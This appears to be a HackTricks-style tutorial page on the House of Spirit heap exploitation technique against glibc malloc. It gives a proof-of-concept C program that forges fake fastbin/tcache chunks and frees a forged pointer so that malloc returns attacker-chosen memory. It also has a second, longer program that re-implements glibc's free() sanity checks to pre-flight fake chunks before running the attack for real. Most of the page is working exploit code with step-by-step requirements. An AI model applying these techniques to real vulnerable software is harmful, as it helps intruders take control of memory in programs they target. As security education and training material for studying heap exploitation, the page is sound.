
House of Spirit

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!


Basic Information

Code

```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];               // chunk falls in fastbin size range (sizeof == 0x40)
};

int main() {
  // Two fake chunks in consecutive memory. glibc aborts with "free(): invalid pointer"
  // if the chunk address is not 16-byte aligned on 64-bit, so force the alignment.
  _Alignas(16) struct fast_chunk fake_chunks[2];
  void *ptr, *victim;

  ptr = malloc(0x30);           // request 0x30 -> chunk size 0x40, same as sizeof(struct fast_chunk)

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", &fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

  // Passes size check of "free(): invalid size" (>= 0x20 and a multiple of 16)
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)". Only the fastbin path checks the next
  // chunk; with tcache (glibc >= 2.26) the fake chunk is accepted after the size check above.
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk (chunk header + 0x10)
  ptr = (void *)&fake_chunks[0].fd;

  free(ptr);                    // the fake chunk now sits in the tcache / fastbin for size 0x40

  victim = malloc(0x30);        // same size class: the allocator hands the fake chunk back
  printf("Victim: %p\n", victim);

  return 0;
}
```

Goal

  • Be able to insert an arbitrary address into the tcache / fast bin so that a later malloc() of the matching size returns it as a chunk, giving the attacker a controlled allocation on top of memory of their choosing (stack, .bss, another heap region).

Requirements

  • The attacker must be able to write a couple of fake fast chunks with correct size fields (the second one only has to supply a plausible size for the "next chunk" check) and to overwrite a pointer to a fast chunk of that size that is about to be freed, so that the attacker's fake chunk is the one that actually ends up in the bin.
  • On 64-bit glibc the fake chunk address must be 16-byte aligned and its size field must be at least 0x20 and a multiple of 16, otherwise free() aborts with "free(): invalid pointer" or "free(): invalid size".
  • Since glibc 2.26 the freed chunk goes into the tcache first, where only the chunk's own size is checked; the "free(): invalid next size (fast)" check on the second fake chunk is only reached on the fastbin path (tcache bin for that size already full, or tcache disabled).

Attack

  • Create a fake chunk that bypasses the security checks (you will need 2 fake chunks: the first carries the size that free() validates, the second supplies a sane "next chunk" size for the fastbin check)
  • Before a pointer is freed, overwrite it with the address of the fake chunk's user data (chunk address + 0x10) so that the fake chunk is the one that gets into the bin
  • Allocate again with the same size: malloc() returns the fake chunk, and whatever the program writes into that allocation lands on the memory the fake chunk overlaps
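The two fake-chunk checks named above are the whole game, so it helps to see exactly what free() verifies. The program below is an added example, not code from the original page or from the linked write-up: it re-implements, in user code, the sanity checks glibc's _int_free() applies on x86-64 (glibc 2.26 and later) before a chunk enters the tcache or a fastbin, so a candidate fake chunk can be pre-flighted before the real free() has a chance to abort. The constants are the x86-64 defaults; `ASSUMED_SYSTEM_MEM` stands in for the arena's `system_mem` (0x21000 is the usual initial value for the main arena but is an assumption here); the function names (`request2size`, `build_fake_chunks`, `check_fake_free`, `verdict_for`) are this example's own. main() then runs the real House of Spirit against glibc with the same layout as the page's code.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* glibc malloc constants for x86-64 (SIZE_SZ == 8); assumed default build. */
#define SIZE_SZ            sizeof(size_t)
#define MALLOC_ALIGNMENT   (2 * SIZE_SZ)           /* 16 */
#define MALLOC_ALIGN_MASK  (MALLOC_ALIGNMENT - 1)
#define MINSIZE            (4 * SIZE_SZ)           /* 0x20: smallest chunk */
#define MAX_FAST           (64 * SIZE_SZ / 4)      /* 0x80: get_max_fast() default */
#define TCACHE_MAX_CHUNK   0x410                   /* 64 tcache bins, 16 bytes apart, from 0x20 */
#define SIZE_BITS          0x7                     /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define ASSUMED_SYSTEM_MEM 0x21000                 /* typical initial main-arena system_mem (assumption) */

enum free_verdict {
    FREE_OK_TCACHE = 0,       /* lands in a tcache bin; the next chunk is never inspected */
    FREE_OK_FASTBIN,          /* tcache unavailable/full: fastbin path, next-size check passed */
    FREE_INVALID_POINTER,     /* "free(): invalid pointer" */
    FREE_INVALID_SIZE,        /* "free(): invalid size" */
    FREE_INVALID_NEXT_SIZE,   /* "free(): invalid next size (fast)" */
    FREE_NOT_FAST             /* too big for tcache and fastbins: not House of Spirit territory */
};

/* The chunk size malloc() uses for a request (glibc request2size()). */
static size_t request2size(size_t req)
{
    size_t sz = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
    return sz < MINSIZE ? MINSIZE : sz;
}

/* Lay two adjacent fake chunks out in buf (16-byte aligned, >= 2*chunk_size bytes)
 * and return the user pointer the victim program would be tricked into freeing. */
static unsigned char *build_fake_chunks(unsigned char *buf, size_t chunk_size, size_t next_size)
{
    memset(buf, 0, 2 * chunk_size);
    memcpy(buf + SIZE_SZ, &chunk_size, SIZE_SZ);              /* fake_chunks[0].size */
    memcpy(buf + chunk_size + SIZE_SZ, &next_size, SIZE_SZ);  /* fake_chunks[1].size */
    return buf + 2 * SIZE_SZ;                                 /* chunk2mem(): skip prev_size and size */
}

/* Mirror of the _int_free() checks a fake chunk must survive. The glibc 2.29+
 * tcache double-free key check is not modelled (it depends on a per-process key). */
static enum free_verdict check_fake_free(const void *user_ptr, int tcache_has_room, size_t system_mem)
{
    uintptr_t p = (uintptr_t)user_ptr - 2 * SIZE_SZ;          /* mem2chunk() */
    size_t raw_size, size;
    memcpy(&raw_size, (const void *)(p + SIZE_SZ), SIZE_SZ);
    size = raw_size & ~(size_t)SIZE_BITS;                     /* chunksize() */

    if (p > (uintptr_t)-size || (p & MALLOC_ALIGN_MASK))      /* wraps, or not 16-byte aligned */
        return FREE_INVALID_POINTER;
    if (size < MINSIZE || (size & MALLOC_ALIGN_MASK))         /* too small, or not a multiple of 16 */
        return FREE_INVALID_SIZE;
    if (size <= TCACHE_MAX_CHUNK && tcache_has_room)          /* tcache_put(): no further checks */
        return FREE_OK_TCACHE;
    if (size > MAX_FAST)
        return FREE_NOT_FAST;

    /* fastbin path: the size field of the chunk right after ours must look sane */
    size_t raw_next, next_size;
    memcpy(&raw_next, (const void *)(p + size + SIZE_SZ), SIZE_SZ);
    next_size = raw_next & ~(size_t)SIZE_BITS;
    if (raw_next <= 2 * SIZE_SZ || next_size >= system_mem)
        return FREE_INVALID_NEXT_SIZE;
    return FREE_OK_FASTBIN;
}

/* Build the layout in a static aligned buffer and judge free() on the forged
 * pointer plus ptr_offset (0 = the pointer an attacker would normally forge). */
static enum free_verdict verdict_for(size_t chunk_size, size_t next_size,
                                     size_t ptr_offset, int tcache_has_room)
{
    static _Alignas(16) unsigned char arena[0x900];
    unsigned char *user = build_fake_chunks(arena, chunk_size, next_size);
    return check_fake_free(user + ptr_offset, tcache_has_room, ASSUMED_SYSTEM_MEM);
}

int main(void)
{
    size_t req = 0x30, csz = request2size(req);               /* 0x30 -> 0x40, as on the page */
    static _Alignas(16) unsigned char fake[0x100];
    unsigned char *forged = build_fake_chunks(fake, csz, csz);
    enum free_verdict v = check_fake_free(forged, 1, ASSUMED_SYSTEM_MEM);

    printf("request %#zx -> chunk size %#zx, pre-flight verdict %d\n", req, csz, v);
    if (v <= FREE_OK_FASTBIN) {                               /* emulation says free() will not abort */
        free(forged);                                         /* fake chunk enters the 0x40 bin */
        void *victim = malloc(req);                           /* same size class: comes straight back */
        printf("forged %p, victim %p -> %s\n", (void *)forged, victim,
               victim == forged ? "House of Spirit worked" : "allocator returned something else");
    }
    return 0;
}
```

Run the pre-flight with `tcache_has_room = 0` as well as `1`: a fake chunk that only passes on the tcache path will still crash the target if the tcache bin for that size already holds seven entries, which is exactly when the second fake chunk's size starts to matter.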

References

  • https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
